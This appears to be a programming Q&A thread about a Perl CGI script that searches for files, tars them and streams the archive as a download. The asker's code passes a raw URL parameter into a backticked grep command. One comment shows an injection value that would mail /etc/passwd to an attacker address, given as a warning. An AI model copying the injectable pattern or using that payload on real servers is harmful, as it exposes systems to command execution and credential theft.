# How to create a CGI in HTML that when clicked run system call and download the data

Tags: html, perl, cgi

I want to have a URL that **only when clicked** the CGI will be executed.

```
<a href=/myweb/cgi-bin/mycgi_long_running.cgi?name=param>Some Param</a>
```

With a single click the CGI will perform the following tasks:

1. Find the files related to the given parameters.
2. Archive them
3. Start downloading for user

How to create the proper state for CGI script for that?

I have the following cgi script but failed:

```
use strict;
use warnings;
use CGI::Carp qw(fatalsToBrowser);
use CGI qw/:standard/;
my $query = CGI->new();


my $file = "listoffiles_withdir.txt";

my $searchkey = param('name');

 #untainting step skipped for briefness

# Begin searching terms and ignoring case
my @entries = `grep -i \"$searchkey\" $file`;
chomp @entries;

my  $outf = 'tempfile.txt';            # output file name
open ( OUTFILE, '>>', $outf)

foreach my $file (@entries}
   print OUTFILE "$file";
}

close(OUTFILE)

# This phase takes may take a long time to do 
# many files involved
system("tar -cf out.tar -T $outf");

# Next step, I'm stuck as how to let the web automatically download
# when the archiving is complete
```

Comment: Is `$param_searchkey` and `$searchkey` supposed to be the same scalar? And do you declare `$file` anywhere? I suggest you add `use strict;use warnings;` to your script.

Comment: Think what happens when I send you a request like http://www.example.com/cgi-bin/yourscript.pl?name=foo\";mail evil_hacker@example.org < /etc/passwd;\" (with appropriate url encoding, left out for clarity here)

Comment: @bigiain: +1. Definitely a good idea to untaint user input data used in system commands.

Answer (score 1):

I haven't done this for a long time, but try fiddling around with something like this:

```
print qq{Content-Disposition: attachment; filename="$outf"\r\n};
print qq{Content-Type: application/octet-stream; name="$outf"\r\n};

open(my $fh, "<", $outf);
my $buf;

while(read($fh, $buf, 100)) {
    print $buf;
}
```

Answer (score 1):

If the tar file is created inside the web server's document root, you don't need to open and stream it through Perl, which can improve performance. Just send a redirect after the CGI is done processing.

Depending on how long the CGI process takes, the browser may decide to close the connection due to timeout. You might want the main page to be a progress page, using JavaScript to update a fancy progress bar, and a final bit of JavaScript to forward the user to their actual file download.